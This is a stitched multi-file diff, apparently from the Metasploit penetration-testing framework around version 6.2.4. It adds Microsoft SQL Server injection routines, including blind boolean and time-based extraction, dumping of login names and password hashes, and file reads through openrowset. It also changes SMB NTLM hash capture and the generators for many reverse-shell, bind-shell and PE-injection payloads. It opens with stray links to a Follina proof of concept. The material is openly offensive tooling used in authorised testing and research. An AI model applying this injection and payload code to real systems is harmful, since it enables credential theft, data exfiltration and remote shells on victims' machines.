+  4. <https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>
+  5. <https://twitter.com/GossiTheDog/status/1531608245009367040>
+  6. <https://github.com/JMousqueton/PoC-CVE-2022-30190>
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "6.2.0"
+      VERSION = "6.2.4"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -0,0 +1,46 @@
+# -*- coding: binary -*-
+
+module Msf
+  ###
+  #
+  # This module provides methods for working with NFS
+  #
+  ###
+  module Auxiliary::Nfs
+    include Auxiliary::Scanner
+
+    def initialize(info = {})
+      super
+      register_options(
+        [
+          OptAddressLocal.new('LHOST', [false, 'IP to match shares against', Rex::Socket.source_address]),
+          OptString.new('HOSTNAME', [false, 'Hostname to match shares against', ''])
+        ]
+      )
+    end
+
+    def can_mount?(locations, mountable = true, hostname = '', lhost = '')
+      # attempts to validate if we'll be able to open it or not based on:
+      # 1. its a wildcard, thus we can open it
+      # 2. hostname isn't blank and its in the list
+      # 3. our IP is explicitly listed
+      # 4. theres a CIDR notation that we're included in.
+      return true unless mountable
+      return true if locations.include? '*'
+      return true if !hostname.blank? && locations.include?(hostname)
+      return true if !lhost.empty? && locations.include?(lhost)
+
+      locations.each do |location|
+        # if it has a subnet mask, convert it to cidr
+        if %r{(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/)(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})} =~ location
+          location = "#{Regexp.last_match(1)}#{Rex::Socket.addr_atoc(Regexp.last_match(2))}"
+        end
+        return true if Rex::Socket::RangeWalker.new(location).include?(lhost)
+        # at this point we assume its a hostname, so we use Ruby's File fnmatch so that it proceses the wildcards
+        # as its a quick and easy way to use glob matching for wildcards and get a boolean response
+        return true if File.fnmatch(location, hostname)
+      end
+      false
+    end
+  end
+end
@@ -252,12 +252,14 @@ module Exploit::Remote::Ipv6
  # which is from DDniele Belluci
  def ipv6_soll_mcast_addr6(addr)
    h = addr.split(':')[-2, 2]
-    m = []
-    m << 'ff'
-    m << (h[0].to_i(16) & 0xff).to_s(16)
-    m << ((h[1].to_i(16) & (0xff << 8)) >> 8).to_s(16)
-    m << (h[1].to_i(16) & 0xff).to_s(16)
-    'ff02::1:' + [m[0,2].join, m[2,2].join].join(':')
+    m = []  
+    x = h[0]
+    x[0..1] = 'ff'
+    m << x
+    x = h[1]
+    x.sub!(/^0*/, "")
+    m << x
+    'ff02::1:' + m.join(':')
  end

  # From Jon Hart's Racket::L3::Misc#soll_mcast_mac()
@@ -38,30 +38,24 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
    combined_hash = "#{user}::#{domain}"

    case ntlm_message.ntlm_version
-    when :ntlmv1
+    when :ntlmv1, :ntlm2_session
      hash_type = 'NTLMv1-SSP'
      client_hash = "#{bin_to_hex(ntlm_message.lm_response)}:#{bin_to_hex(ntlm_message.ntlm_response)}"

      combined_hash << ":#{client_hash}"
      combined_hash << ":#{bin_to_hex(challenge)}"
+      jtr_format = JTR_NTLMV1
    when :ntlmv2
      hash_type = 'NTLMv2-SSP'
      client_hash = "#{bin_to_hex(ntlm_message.ntlm_response[0...16])}:#{bin_to_hex(ntlm_message.ntlm_response[16..-1])}"

      combined_hash << ":#{bin_to_hex(challenge)}"
      combined_hash << ":#{client_hash}"
+      jtr_format = JTR_NTLMV2
    end

    return if hash_type.nil?

-    # TODO: write method for mapping +major+ and +minor+ OS values to human-readable OS names.
-    # client_os_version = ::NTLM::OSVersion.read(type1_msg.os_version)
-    print_line "[SMB] #{hash_type} Client     : #{address}"
-    # print_line "[SMB] #{hash_type} Client OS  : #{client_os_version}"
-    print_line "[SMB] #{hash_type} Username   : #{domain}\\#{user}"
-    print_line "[SMB] #{hash_type} Hash       : #{combined_hash}"
-    print_line
-
    jtr_format = ntlm_message.ntlm_version == :ntlmv1 ? JTR_NTLMV1 : JTR_NTLMV2

    if active_db?
@@ -103,9 +97,30 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
      # found_host.os_name = credential_options[:client_os_version]
      # found_host.save!

+      search_options = {
+        realm: credential_options[:realm_value],
+        user: credential_options[:username],
+        hosts: credential_options[:address],
+        jtr_format: credential_options[:jtr_format],
+        type: Metasploit::Credential::NonreplayableHash,
+        workspace: framework.db.workspace
+      }
+      if framework.db.creds(search_options).count > 0
+        vprint_status("Skipping previously captured hash for #{credential_options[:realm_value]}\\#{credential_options[:username]}")
+        return
+      end
+
      create_credential(credential_options)
    end

+    # TODO: write method for mapping +major+ and +minor+ OS values to human-readable OS names.
+    # client_os_version = ::NTLM::OSVersion.read(type1_msg.os_version)
+    print_line "[SMB] #{hash_type} Client     : #{address}"
+    # print_line "[SMB] #{hash_type} Client OS  : #{client_os_version}"
+    print_line "[SMB] #{hash_type} Username   : #{domain}\\#{user}"
+    print_line "[SMB] #{hash_type} Hash       : #{combined_hash}"
+    print_line
+
    if datastore['JOHNPWFILE']
      path = build_jtr_file_name(jtr_format)

@@ -0,0 +1,2 @@
+module Msf::Exploit::SQLi::Mssqli
+end
@@ -0,0 +1,16 @@
+#
+#   Boolean-Based Blind SQL injection support for MySQL
+#
+class Msf::Exploit::SQLi::Mssqli::BooleanBasedBlind < Msf::Exploit::SQLi::Mssqli::Common
+  include Msf::Exploit::SQLi::BooleanBasedBlindMixin
+
+  #
+  # This method checks if the target is vulnerable to Blind boolean-based injection by checking that
+  # the values returned by the bloc for some boolean queries are correct.
+  #
+  def test_vulnerable
+    out_true = blind_request('1=1')
+    out_false = blind_request('1=2')
+    out_true && !out_false
+  end
+end
@@ -0,0 +1,314 @@
+# coding: ascii-8bit
+
+require 'base64'
+#
+# This class represents a Microsoft SQL Server Injection object, its primary purpose is to provide the common queries
+# needed when performing SQL injection.
+# Instantiate it only if you get the query results of your SQL injection returned on the response.
+#
+module Msf::Exploit::SQLi::Mssqli
+  class Common < Msf::Exploit::SQLi::Common
+    #
+    # Encoders supported by Microsoft SQL Server
+    # Keys are MSSQL function names, values are decoding procs in Ruby
+    #
+    ENCODERS = {
+      hex: {
+        encode: 'master.dbo.fn_varbintohexstr(CAST(^DATA^ as varbinary(max)))',
+        decode: proc { |data| Rex::Text.hex_to_raw(data.start_with?('0x') ? data[2..-1] : data) }
+      }
+    }.freeze
+
+    #
+    #   See SQLi::Common#initialize
+    #
+    def initialize(datastore, framework, user_output, opts = {}, &query_proc)
+      opts[:concat_separator] ||= ','
+      if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
+        # if it's a String or a Symbol, use a predefined encoder if it exists
+        opts[:encoder] = opts[:encoder].downcase.intern
+        opts[:encoder] = ENCODERS[opts[:encoder]] if ENCODERS[opts[:encoder]]
+      end
+      super
+    end
+
+    #
+    #   Query the Microsoft SQL Server version
+    #   @return [String] The Microsoft SQL Server version in use
+    #
+    def version
+      call_function('@@VERSION')
+    end
+
+    #
+    #   Query the current database name
+    #   @return [String] The name of the current database
+    #
+    def current_database
+      call_function('DB_NAME()')
+    end
+
+    #
+    #   Query the hostname
+    #   @return [String] The hostname of the server running Microsoft SQL Server
+    #
+    def hostname
+      call_function('@@SERVERNAME')
+    end
+
+    #   Query the current user
+    #   @return [String] The username of the current user
+    #
+    def current_user
+      call_function('user_name()')
+    end
+
+    #
+    #   Query the names of all the existing databases
+    #   @return [Array] An array of Strings, the database names
+    #
+    def enum_database_names
+      dump_table_fields('master..sysdatabases', %w[name]).flatten
+    end
+
+    #
+    #   Query the names of the tables in a given database
+    #   @param database [String] the name of a database, or nil or an empty string for the current database
+    #   @return [Array] An array of Strings, the table names in the given database
+    #
+    def enum_table_names(database = '')
+      sysobjects_tbl = "#{database.nil? || database.empty? ? '' : database + '..'}sysobjects"
+      dump_table_fields(sysobjects_tbl, %w[name], "xtype='U'").flatten
+    end
+
+    def enum_view_names(database = '')
+      sysobjects_tbl = "#{database.nil? || database.empty? ? '' : database + '..'}sysobjects"
+      dump_table_fields(sysobjects_tbl, %w[name], "xtype='V'").flatten
+    end
+
+    #
+    # Query the mssql users (their username and password), this might require root privileges.
+    # @return [Array] an array of arrays representing rows, where each row contains two strings, the username and password
+    #
+    def enum_dbms_users
+      # might require root privileges
+      dump_table_fields('master..syslogins', %w[name password])
+    end
+
+    #
+    #   Query the column names of the given table in the given database
+    #   @param table_name [String] the name of the table of which you want to query the column names, can be: database.table
+    #   @return [Array] An array of Strings, the column names in the given table belonging to the given database
+    #
+    def enum_table_columns(table_name)
+      table_schema_condition = ''
+      if table_name.include?('.')
+        database, table_name = table_name.split(/\.{1,2}/)
+        database += '..'
+      else
+        database = ''
+      end
+      dump_table_fields("#{database}syscolumns", %w[name],
+                        "id=(select id from #{database}sysobjects where name='#{table_name}')").flatten
+    end
+
+    #
+    #  Query the given columns of the records of the given table, that satisfy an optional condition
+    #  @param table [String]  The name of the table to query
+    #  @param columns [Array] The names of the columns to query
+    #  @param condition [String] An optional condition, return only the rows satisfying it
+    #  @param num_limit [Integer] An optional maximum number of results to return
+    #  @return [Array] An array, where each element is an array of strings representing a row of the results
+    #
+    def dump_table_fields(table, columns, condition = '', num_limit = 0)
+      return '' if columns.empty?
+
+      columns = columns.map do |col|
+        col = "cast(isnull(#{col},'#{@null_replacement}') as varchar(max))"
+        @encoder ? @encoder[:encode].sub(/\^DATA\^/, col) : col
+      end.join("+'#{@second_concat_separator}'+")
+      unless condition.empty?
+        condition = ' where ' + condition
+      end
+      num_limit = num_limit.to_i
+      limit = num_limit > 0 ? " top #{num_limit}" : ''
+      retrieved_data = nil
+      identifier_generator = Rex::RandomIdentifier::Generator.new
+      if @safe
+        # no group_concat, leak one row at a time
+        count_item = 'cast(count(1) as varchar(max))'
+        count_item = @encoder ? @encoder[:encode].sub(/\^DATA\^/, count_item) : count_item
+        row_count = run_sql("select #{count_item} from #{table}#{condition}")
+        row_count = @encoder ? @encoder[:decode].call(row_count).to_i : row_count.to_i
+        num_limit = row_count if num_limit == 0 || row_count < num_limit
+        # generate a random alias for every column name
+        item_alias, row_alias, tab_alias = 3.times.map { identifier_generator.generate }
+        retrieved_data = num_limit.times.map do |current_row|
+          if @truncation_length
+            truncated_query("select top(1) substring(#{item_alias},^OFFSET^,#{@truncation_length}) from (select #{columns} #{item_alias},ROW_NUMBER() over (order by (select 1)) #{row_alias} from #{table}#{condition}) #{tab_alias} where #{row_alias}=#{current_row + 1}")
+          else
+            run_sql("select top(1) #{item_alias} from (select #{columns} #{item_alias},ROW_NUMBER() over (order by (select 1)) #{row_alias} from #{table}#{condition}) #{tab_alias} where #{row_alias}=#{current_row + 1}")
+          end
+        end
+      elsif num_limit > 0
+        # if limit > 0, an alias will be necessary
+        alias1, alias2 = 2.times.map { identifier_generator.generate }
+        if @truncation_length
+          retrieved_data = truncated_query("select substring(string_agg(#{alias1}, '#{@concat_separator}')," \
+          "^OFFSET^,#{@truncation_length}) from (select #{limit}#{columns} #{alias1} from #{table}"\
+          "#{condition}) #{alias2}").split(@concat_separator || ',')
+        else
+          retrieved_data = run_sql("select string_agg(#{alias1},'#{@concat_separator}')"\
+          " from (select #{limit}#{columns} #{alias1} from #{table}#{condition}) #{alias2}").split(@concat_separator || ',')
+        end
+      elsif @truncation_length
+        retrieved_data = truncated_query("select #{limit}substring(string_agg(#{columns},'#{@concat_separator}')," \
+          "^OFFSET^,#{@truncation_length}) from #{table}#{condition}").split(@concat_separator || ',')
+      else
+        retrieved_data = run_sql("select #{limit}string_agg(#{columns},'#{@concat_separator}')" \
+        " from #{table}#{condition}").split(@concat_separator || ',')
+      end
+
+      retrieved_data.map do |row|
+        row = row.split(@second_concat_separator)
+        @encoder ? row.map { |x| @encoder[:decode].call(x) } : row
+      end
+    end
+
+    #
+    # Checks if the target is vulnerable (if the SQL injection is working fine), by checking that
+    # queries that should return known results return the results we expect from them
+    #
+    def test_vulnerable
+      random_string_len = @truncation_length ? [rand(2..10), @truncation_length].min : rand(2..10)
+      random_string = Rex::Text.rand_text_alphanumeric(random_string_len)
+      query_string = "'#{random_string}'"
+      query_string = @encoder[:encode].sub(/\^DATA\^/, query_string) if @encoder
+      output = run_sql("select #{query_string}")
+      return false if output.nil?
+      (@encoder ? @encoder[:decode].call(output) : output) == random_string
+    end
+
+    #
+    # Attempt writing data to the file at the given path
+    #
+    def write_to_file(fpath, data)
+      run_sql("select '#{data}' into dumpfile '#{fpath}'")
+    end
+
+    #
+    # Attempt reading from a file on the filesystem
+    # @param fpath [String] The path of the file to read
+    # @return [String] The content of the file if reading was successful
+    #
+    def read_from_file(fpath, binary=false)
+      alias1 = Rex::Text.rand_text_alpha(1) + Rex::Text.rand_text_alphanumeric(5..11)
+      expr = @encoder ? @encoder[:encode].sub(/\^DATA\^/, 'BulkColumn') : 'BulkColumn'
+      output = if @truncation_length
+        truncated_query("select substring(#{expr},^OFFSET^,#{@truncation_length}) " \
+        "from openrowset(bulk N'#{fpath}',SINGLE_CLOB) as #{alias1}")
+      else
+        run_sql("select #{expr} from openrowset(bulk N'#{fpath}',SINGLE_CLOB) as #{alias1}")
+      end
+      output = @encoder[:decode].call(output) if @encoder
+      output
+    end
+
+    private
+
+    #
+    #  Helper method used in cases where the response is truncated.
+    #  @param query [String] The SQL query to execute, where ^OFFSET^ will be replaced with an integer offset for querying
+    #  @return [String] The query result
+    #
+    def truncated_query(query)
+      result = [ ]
+      offset = 1
+      loop do
+        slice = run_sql(query.sub(/\^OFFSET\^/, offset.to_s))
+        offset += @truncation_length # should be same as @truncation_length for most cases
+        result << slice
+        vprint_status "{SQLi} Truncated output: #{slice} of size #{slice.size}"
+        print_warning "The block returned a string larger than the truncation size : #{slice}" if slice.length > @truncation_length
+        break if slice.length < @truncation_length
+      end
+      result.join
+    end
+
+    #
+    # Checks the options specific to Microsoft SQL Server (if any)
+    #
+    def check_opts(opts)
+      unless opts[:encoder].nil? || opts[:encoder].is_a?(Hash) || ENCODERS[opts[:encoder].downcase.intern]
+        raise ArgumentError, 'Unsupported encoder'
+      end
+
+      super
+    end
+
+    def call_function(function)
+      function = @encoder[:encode].sub(/\^DATA\^/, function) if @encoder
+      output = nil
+      if @truncation_length
+        output = truncated_query("select substring(#{function},^OFFSET^,#{@truncation_length})")
+      else
+        output = run_sql("select #{function}")
+      end
+      output = @encoder[:decode].call(output) if @encoder
+      output
+    end
+
+    def blind_detect_length(query, timebased)
+      if_function = ''
+      sleep_part = ''
+      if timebased
+        if_function = 'if(' + if_function
+        sleep_part += ") waitfor delay '0:0:#{datastore['SqliDelay'].to_i}'"
+      end
+      i = 0
+      output_length = 0
+      loop do
+        output_bit = blind_request("#{if_function}cast(datalength(cast((#{query}) as varchar(max))) as bigint)&cast(#{1 << i} as bigint)=0#{sleep_part}")
+        output_length |= (1 << i) unless output_bit
+        i += 1
+        stop = blind_request("#{if_function}cast(datalength(cast((#{query}) as varchar(max))) as bigint)/cast(#{1 << i} as bigint)=0#{sleep_part}")
+        break if stop
+      end
+      output_length
+    end
+
+    def blind_dump_data(query, length, known_bits, bits_to_guess, timebased)
+      if_function = ''
+      sleep_part = ''
+      if timebased
+        if_function = 'if(' + if_function
+        sleep_part += ") waitfor delay '0:0:#{datastore['SqliDelay'].to_i}'"
+      end
+      output = length.times.map do |j|
+        current_character = known_bits
+        bits_to_guess.times do |k|
+          # the query below: the inner substr returns a character from the result, the outer returns a bit of it
+          output_bit = blind_request("#{if_function}ascii(substring(cast((#{query}) as varchar(max)), #{j + 1}, 1))&#{1 << k}=0#{sleep_part}")
+          current_character |= (1 << k) unless output_bit
+        end
+        current_character.chr
+      end.join
+      output
+    end
+
+    #
+    #  Encodes strings in the query string as hexadecimal numbers
+    #
+    def hex_encode_strings(query)
+      # for more encoding capabilities, run code at the beginning of your block
+      query.gsub(/'.*?'|".*?"/) do |match|
+        str = match[1..-2]
+        if str.empty?
+          "left(char(#{rand(0..255)}),0)"
+        else
+          str.each_codepoint.map { |code| "char(#{code})" }.join('+')
+        end
+      end
+    end
+  end
+end
@@ -0,0 +1,17 @@
+#
+#   Time-Based Blind SQL injection support for MySQL
+#
+class Msf::Exploit::SQLi::Mssqli::TimeBasedBlind < Msf::Exploit::SQLi::Mssqli::Common
+  include ::Msf::Exploit::SQLi::TimeBasedBlindMixin
+
+  #
+  # This method checks if the target is vulnerable to Blind time-based injection by checking if
+  # the target sleeps only when a given condition is true.
+  #
+  def test_vulnerable
+    # run_sql and check if output is what's expected, or just check for delays?
+    out_true = blind_request("if(1=1) waitfor delay '0:0:#{datastore['SqliDelay'].to_i}'")
+    out_false = blind_request("if(1=2) waitfor delay '0:0:#{datastore['SqliDelay'].to_i}'")
+    out_true && !out_false
+  end
+end
@@ -13,7 +13,7 @@ module Msf::Exploit::SQLi::MySQLi
    #
    ENCODERS = {
      base64: {
-        encode: 'to_base64(^DATA^)',
+        encode: 'replace(to_base64(^DATA^), \'\\n\', \'\')',
        decode: proc { |data| Base64.decode64(data) }
      },
      hex: {
@@ -197,7 +197,11 @@ module Msf::Exploit::SQLi::MySQLi
    def test_vulnerable
      random_string_len = @truncation_length ? [rand(2..10), @truncation_length].min : rand(2..10)
      random_string = Rex::Text.rand_text_alphanumeric(random_string_len)
-      run_sql("select '#{random_string}'") == random_string
+      query_string = "'#{random_string}'"
+      query_string = @encoder[:encode].sub(/\^DATA\^/, query_string) if @encoder
+      output = run_sql("select #{query_string}")
+      return false if output.nil?
+      (@encoder ? @encoder[:decode].call(output) : output) == random_string
    end

    #
@@ -213,10 +217,11 @@ module Msf::Exploit::SQLi::MySQLi
    #
    # Attempt reading from a file on the filesystem, requires having the FILE privilege
    # @param fpath [String] The path of the file to read
+    # @param binary [Boolean] Whether the target file is a binary one or not
    # @return [String] The content of the file if reading was successful
    #
-    def read_from_file(fpath)
-      run_sql("select load_file('#{fpath}')")
+    def read_from_file(fpath, binary=false)
+      call_function("load_file('#{fpath}')")
    end

    private
@@ -13,7 +13,7 @@ module Msf::Exploit::SQLi::PostgreSQLi
    #
    ENCODERS = {
      base64: {
-        encode: 'encode(^DATA^::bytea, \'base64\')',
+        encode: 'translate(encode(^DATA^::bytea, \'base64\'), E\'\n\',\'\')',
        decode: proc { |data| Base64.decode64(data) }
      },
      hex: {
@@ -189,7 +189,11 @@ module Msf::Exploit::SQLi::PostgreSQLi
    def test_vulnerable
      random_string_len = @truncation_length ? [rand(2..10), @truncation_length].min : rand(2..10)
      random_string = Rex::Text.rand_text_alphanumeric(random_string_len)
-      run_sql("select '#{random_string}'") == random_string
+      query_string = "'#{random_string}'"
+      query_string = @encoder[:encode].sub(/\^DATA\^/, query_string) if @encoder
+      output = run_sql("select #{query_string}")
+      return false if output.nil?
+      (@encoder ? @encoder[:decode].call(output) : output) == random_string
    end

    #
@@ -202,6 +206,22 @@ module Msf::Exploit::SQLi::PostgreSQLi
      raw_run_sql("copy (select '#{data}') to '#{fname}'")
    end

+    #
+    # Attempt reading from a file on the filesystem
+    # @param fpath [String] The path of the file to read
+    # @param binary [String] Whether the target file should be considered a binary one (defaults to false)
+    # @return [String] The content of the file if reading was successful
+    #
+    def read_from_file(fpath, binary=false)
+      if binary
+        # pg_read_binary_file returns bytea
+        # an encoder might be needed
+        call_function("pg_read_binary_file('#{fpath}')")
+      else
+        call_function("pg_read_file('#{fpath}')")
+      end
+    end
+
    private

    #
@@ -146,6 +146,7 @@ module Msf::Exploit::SQLi::SQLitei
      query_string = "'#{random_string}'"
      query_string = @encoder[:encode].sub(/\^DATA\^/, query_string) if @encoder
      output = run_sql("select #{query_string}")
+      return false if output.nil?
      (@encoder ? @encoder[:decode].call(output) : output) == random_string
    end

@@ -59,10 +59,10 @@ class Payload < Msf::Module
    #
    self.module_info['Dependencies'] = self.module_info['Dependencies'] || []

-    # If this is a staged payload but there is no stage information,
+    # If this is an adapted or staged payload but there is no stage information,
    # then this is actually a stager + single combination.  Set up the
    # information hash accordingly.
-    if self.class.include?(Msf::Payload::Single) and
+    if (self.class.include?(Msf::Payload::Adapter) || self.class.include?(Msf::Payload::Single)) and
      self.class.include?(Msf::Payload::Stager)
      self.module_info['Stage'] = {}

@@ -288,7 +288,7 @@ class Payload < Msf::Module
  #
  # Generates the payload and returns the raw buffer to the caller.
  #
-  def generate
+  def generate(_opts = {})
    internal_generate
  end

@@ -43,7 +43,7 @@ module Payload::Generic
  # the actual payload in case settings have changed.  Other methods will
  # use the cached version if possible.
  #
-  def generate
+  def generate(_opts = {})
    reset

    redirect_to_actual(:generate)
@@ -19,7 +19,7 @@ module Payload::Linux::BindTcp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:     datastore['LPORT'],
      reliable: false
@@ -18,7 +18,7 @@ module Payload::Linux::ReverseTcp_x86
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:          datastore['LPORT'],
      host:          datastore['LHOST'],
@@ -17,7 +17,7 @@ module Payload::Linux::ReverseTcp_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -17,7 +17,7 @@ module Payload::Php::BindTcp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port: datastore['LPORT']
    }
@@ -17,7 +17,7 @@ module Payload::Php::ReverseTcp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -16,7 +16,7 @@ module Payload::Python::BindTcp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port: datastore['LPORT']
    }
@@ -21,7 +21,7 @@ module Payload::Python::ReverseTcp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -20,7 +20,7 @@ module Payload::Python::ReverseTcpSsl
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -23,7 +23,7 @@ module Msf::Payload::Single
  # return the stager.  When a stager is not used, generate will return the
  # single payload
  #
-  def generate
+  def generate(_opts = {})
    # If we're staged, then we call the super to generate the STAGER
    if staged?
      super
@@ -30,7 +30,7 @@ module Payload::Windows::BindNamedPipe
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      name:        datastore['PIPENAME'],
      host:        datastore['PIPEHOST'],
@@ -21,7 +21,7 @@ module Payload::Windows::BindTcp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:     datastore['LPORT'],
      reliable: false
@@ -17,7 +17,7 @@ module Payload::Windows::BindTcpRc4
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
    conf = {
      port:     datastore['LPORT'],
@@ -61,9 +61,9 @@ module Payload::Windows::EncryptedReverseTcp

    src = ''
    if staged?
-      src = generate_stager(conf)
+      src = generate_stager(conf, opts)
    else
-      src = generate_c_src(conf)
+      src = generate_c_src(conf, opts)
    end

    link_script = module_info['DefaultOptions']['LinkerScript']
@@ -76,7 +76,7 @@ module Payload::Windows::EncryptedReverseTcp
      keep_exe:      datastore['KeepExe'],
      show_compile_cmd: datastore['ShowCompileCMD'],
      f_name:        Tempfile.new(staged? ? 'reverse_pic_stager' : 'reverse_pic_stageless').path,
-      arch:          self.arch_to_s
+      arch:          opts.fetch(:arch, self.arch_to_s)
    }

    comp_code = get_compiled_shellcode(src, compile_opts)
@@ -92,9 +92,9 @@ module Payload::Windows::EncryptedReverseTcp
    comp_code
  end

-  def initial_code
+  def initial_code(conf, opts = {})
    src = headers
-    src << align_rsp if self.arch_to_s.eql?('x64')
+    src << align_rsp if opts.fetch(:arch, self.arch_to_s).eql?('x64')

    if staged?
      src << chacha_func_staged
@@ -104,8 +104,8 @@ module Payload::Windows::EncryptedReverseTcp
    src << exit_proc
  end

-  def generate_stager(conf)
-    src = initial_code
+  def generate_stager(conf, opts = {})
+    src = initial_code(conf, opts)

    if conf[:call_wsastartup]
      src << init_winsock
@@ -115,7 +115,7 @@ module Payload::Windows::EncryptedReverseTcp
    src << get_load_library(conf[:host], conf[:port])
    src << call_init_winsock if conf[:call_wsastartup]
    src << start_comm(conf[:uuid])
-    src << stager_comm
+    src << stager_comm(conf, opts)
  end

  def sends_hex_uuid?
@@ -148,21 +148,21 @@ module Payload::Windows::EncryptedReverseTcp
      keep_exe:      datastore['KeepExe'],
      show_compile_cmd: datastore['ShowCompileCMD'],
      f_name:        Tempfile.new('reverse_pic_stage').path,
-      arch:          self.arch_to_s
+      arch:          opts.fetch(:arch, self.arch_to_s)
    }

-    src = initial_code
+    src = initial_code(conf, opts)
    src << get_new_key
    src << init_proc
-    src << exec_payload_stage
+    src << exec_payload_stage(conf, opts)
    shellcode = get_compiled_shellcode(src, comp_opts)

    stage_obj = Rex::Crypto::Chacha20.new(key, iv)
    stage_obj.chacha20_crypt(shellcode)
  end

-  def generate_c_src(conf)
-    src = initial_code
+  def generate_c_src(conf, opts = {})
+    src = initial_code(conf, opts)

    if conf[:call_wsastartup]
      src << init_winsock
@@ -552,9 +552,10 @@ module Payload::Windows::EncryptedReverseTcp
    ^
  end

-  def stager_comm
-    reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
-    inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+  def stager_comm(conf, opts = {})
+    arch = opts.fetch(:arch, self.arch_to_s)
+    reg = arch.eql?('x86') ? 'edi' : 'rdi'
+    inst = arch.eql?('x86') ? 'movl' : 'movq'

    %Q^
        FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')}); // hash('ws2_32.dll', 'recv') -> 0x5fc8d902
@@ -596,9 +597,10 @@ module Payload::Windows::EncryptedReverseTcp
    ^
  end

-  def exec_payload_stage
-    reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
-    inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
+  def exec_payload_stage(conf, opts = {})
+    arch = opts.fetch(:arch, self.arch_to_s)
+    reg = arch.eql?('x86') ? 'edi' : 'rdi'
+    inst = arch.eql?('x86') ? 'movl' : 'movq'

    %Q^
     void ExecutePayload()
@@ -57,7 +57,7 @@ module Payload::Windows::Exec
  #
  # Constructs the payload
  #
-  def generate
+  def generate(_opts = {})
    return super + command_string + "\x00"
  end

@@ -53,7 +53,7 @@ module Payload::Windows::Exec_x64
      ], self.class )
  end

-  def generate
+  def generate(_opts = {})
    return super + command_string + "\x00"
  end

@@ -57,7 +57,7 @@ module Payload::Windows::LoadLibrary
  #
  # Constructs the payload
  #
-  def generate
+  def generate(_opts = {})
    return super + dll_string + "\x00"
  end

@@ -67,8 +67,9 @@ module Msf
  module Payload::Windows::PEInject
    def initialize(info = {})
      super
+
      register_options([
-        OptInjectablePE.new('PE', [ true, 'The local path to the PE file to upload' ], arch: arch.first)
+        OptInjectablePE.new('PE', [ true, 'The local path to the PE file to upload' ], arch: info.fetch('AdaptedArch', arch.first))
      ], self.class)
    end

@@ -83,7 +84,7 @@ module Msf
    # Transmits the reflective PE payload to the remote
    # computer so that it can be loaded into memory.
    #
-    def handle_connection(conn, _opts = {})
+    def handle_connection(conn, opts = {})
      data = ''
      begin
        File.open(pe_path, 'rb') do |f|
@@ -96,7 +97,7 @@ module Msf
      end

      print_status('Premapping PE file...')
-      pe_map = create_pe_memory_map(data)
+      pe_map = create_pe_memory_map(data, opts)
      print_status("Mapped PE size #{pe_map[:bytes].length}")
      opts = {}
      opts[:is_dll] = pe_map[:is_dll]
@@ -113,10 +114,10 @@ module Msf
      conn.close
    end

-    def create_pe_memory_map(file)
+    def create_pe_memory_map(file, opts = {})
      pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(file))
      begin
-        OptInjectablePE.assert_compatible(pe, arch.first)
+        OptInjectablePE.assert_compatible(pe, opts.fetch(:arch, arch.first))
      rescue Msf::ValidationError => e
        print_error("PE validation error: #{e.message}")
        raise
@@ -26,7 +26,7 @@ module Payload::Windows::ReverseNamedPipe
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      name:        datastore['PIPENAME'],
      host:        datastore['PIPEHOST'] || '.',
@@ -25,7 +25,7 @@ module Payload::Windows::ReverseTcpDns
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -17,7 +17,7 @@ module Payload::Windows::ReverseTcpRc4
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
    conf = {
      port:        datastore['LPORT'],
@@ -17,7 +17,7 @@ module Payload::Windows::ReverseTcpRc4Dns
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
    conf = {
      port:        datastore['LPORT'],
@@ -16,7 +16,7 @@ module Payload::Windows::ReverseUdp
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -29,7 +29,7 @@ module Payload::Windows::ReverseWinHttps
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})

    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                         datastore['HandlerSSLCert'])
@@ -30,7 +30,7 @@ module Payload::Windows::BindNamedPipe_x64
  #
  # Generate the first stage
  #
-  def generate
